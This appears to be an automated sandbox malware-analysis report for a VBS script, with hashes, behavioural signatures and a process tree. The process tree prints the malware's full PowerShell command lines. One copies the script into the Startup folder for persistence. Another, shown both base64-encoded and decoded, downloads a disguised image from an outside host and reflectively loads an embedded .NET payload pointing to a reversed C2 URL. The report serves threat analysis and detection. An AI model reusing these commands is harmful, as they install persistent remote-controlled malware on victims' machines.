Analysis
-
max time kernel
121s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-10-2023 21:36
Static task
static1
Behavioral task
behavioral1
Sample
6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs
Resource
win10v2004-20230915-en
General
-
Target
6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs
-
Size
320KB
-
MD5
be7f3a961e31db70ef7251ac44c46972
-
SHA1
b84c4321a2fc1bfcff4c5c915c820402b06940a7
-
SHA256
6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6
-
SHA512
73b11a57c9e16757ee493f98630a49498cc1424bc3a05d8746a09da3dc9153ec877cbd791f290d28436ef496a1e95deb0ae0dddcfa7f2324287fbbaf98b46132
-
SSDEEP
6144:DeeeeeDeeeee4WvwvMweeeeesMvlvsweeeeeIeeeee0eeeee1eeeee6eeeee4eeY:h
Malware Config
Extracted
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1176 powershell.exe 7 1176 powershell.exe 9 1176 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2808 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2652 powershell.exe 2504 powershell.exe 1176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 1176 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1632 wrote to memory of 2596 1632 WScript.exe 30 PID 1632 wrote to memory of 2596 1632 WScript.exe 30 PID 1632 wrote to memory of 2596 1632 WScript.exe 30 PID 2596 wrote to memory of 2808 2596 cmd.exe 32 PID 2596 wrote to memory of 2808 2596 cmd.exe 32 PID 2596 wrote to memory of 2808 2596 cmd.exe 32 PID 2596 wrote to memory of 2704 2596 cmd.exe 33 PID 2596 wrote to memory of 2704 2596 cmd.exe 33 PID 2596 wrote to memory of 2704 2596 cmd.exe 33 PID 2704 wrote to memory of 2652 2704 cmd.exe 34 PID 2704 wrote to memory of 2652 2704 cmd.exe 34 PID 2704 wrote to memory of 2652 2704 cmd.exe 34 PID 1632 wrote to memory of 2504 1632 WScript.exe 36 PID 1632 wrote to memory of 2504 1632 WScript.exe 36 PID 1632 wrote to memory of 2504 1632 WScript.exe 36 PID 2504 wrote to memory of 1176 2504 powershell.exe 37 PID 2504 wrote to memory of 1176 2504 powershell.exe 37 PID 2504 wrote to memory of 1176 2504 powershell.exe 37
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs')"2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2808
-
-
C:\Windows\system32\cmd.execmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs')"3⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs')4⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADYAMwAvADYAMgAxAC8AbwByAGkAZwBpAG4AYQBsAC8AdQBuAGkAdgBlAHIAcwBvAF8AdgBiAHMALgBqAHAAZQBnAD8AMQA2ADkAMAA5ADMAMQA4ADUANQAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQA7ACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAYQByAGcAdQBtAGUAbgB0AHMAIAA9ACAALAAoACcAdAB4AHQALgA0ADMAOQA5ADIAZwBqAC8AbAB0AC8ANwA2ADEALgAxADYAMQAuADYANQAxAC4ANAA5AC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.43992gj/lt/761.161.651.49//:ptth');$method.Invoke($null, $arguments)"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD54d73329eb00c114fad525f13d32291f3
SHA15aacf91461234416208a9fa938a9423da67cb286
SHA2568dd406f2cfbeb2b952a476106e0b46501fc38c2c4fa3a7a5c4a747e7ddbae6fa
SHA51206e01c65fd8b8491eb9f4908a069d8b7293a63261c806d4c7226ea663df0f16d1a9bde61983c36ce4af7bb570dbdc21cee671f07662f43474b6672e26380f583
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fe61dc58be8eb0946219b90aac0904b0
SHA19f5409becb705007536b4809576fb866b254b26a
SHA2563589f47015edfe51b78c700808758b95f67474e969f1ef430ca6165006aae0e5
SHA512c2d89f07a4b9bdab0c8f0b0f47352189fa593fe5e3d06552ef719bac1a95926cb32fbe9ca3ef09e258378c9f452d7c6f6f493cd2f2d2033dac4e870b5072daf9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fe61dc58be8eb0946219b90aac0904b0
SHA19f5409becb705007536b4809576fb866b254b26a
SHA2563589f47015edfe51b78c700808758b95f67474e969f1ef430ca6165006aae0e5
SHA512c2d89f07a4b9bdab0c8f0b0f47352189fa593fe5e3d06552ef719bac1a95926cb32fbe9ca3ef09e258378c9f452d7c6f6f493cd2f2d2033dac4e870b5072daf9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYNQ4GSTYJ189KG9847D.temp
Filesize7KB
MD5fe61dc58be8eb0946219b90aac0904b0
SHA19f5409becb705007536b4809576fb866b254b26a
SHA2563589f47015edfe51b78c700808758b95f67474e969f1ef430ca6165006aae0e5
SHA512c2d89f07a4b9bdab0c8f0b0f47352189fa593fe5e3d06552ef719bac1a95926cb32fbe9ca3ef09e258378c9f452d7c6f6f493cd2f2d2033dac4e870b5072daf9